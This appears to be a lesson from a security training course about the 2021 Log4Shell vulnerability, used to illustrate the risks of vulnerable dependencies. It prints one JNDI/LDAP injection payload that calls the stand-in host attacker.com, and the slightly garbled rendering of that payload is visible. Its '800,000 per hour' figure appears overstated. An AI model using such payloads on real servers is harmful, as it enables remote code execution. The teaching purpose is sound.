Task 1 of 6
Real Breach: Log4Shell — One Line That Broke the Internet
## The Most Critical Vulnerability in a Decade
On 9 December 2021, a security researcher tweeted a proof-of-concept exploit for a vulnerability in **Log4j** — a Java logging library so ubiquitous it runs inside millions of products you've heard of: Minecraft, iCloud, LinkedIn, Twitter, Cloudflare, Amazon AWS, Tesla.
The attack was devastating in its simplicity. Log4j logged user input — usernames, search queries, HTTP headers — and it would automatically *resolve* certain special strings it found in that input. The payload looked like this:
```
{jndi:ldap://attacker.com/exploit{'}'}
```
Type that as your Minecraft username. The server logs it. Log4j sees it. Log4j reaches out to attacker.com, downloads a Java class file, and **executes it**. Full remote code execution. No credentials needed. No prior access. One string in a text field.
---
### The Scale Was Unprecedented
Within **72 hours** of public disclosure:
- **Over 800,000 exploit attempts** were detected per hour globally
- Nation-state groups (China, Iran, North Korea) were confirmed exploiting it within days
- CISA issued an emergency directive to all US federal agencies
- Governments worldwide issued emergency bulletins
The fix? Update Log4j to a patched version. But first you have to know you're using it. Thousands of companies didn't even know Log4j was in their stack — it was a transitive dependency, pulled in by a library that was pulled in by another library.
---
### Why This Matters for Vulnerable Components
Log4Shell is the ultimate case study for OWASP A06 — Vulnerable and Outdated Components. The vulnerability was in a library, not in any company's own code. The exploit was trivial. The fix was one version bump. The damage was measured in the billions.
**The lesson:** your app is only as secure as every library it depends on.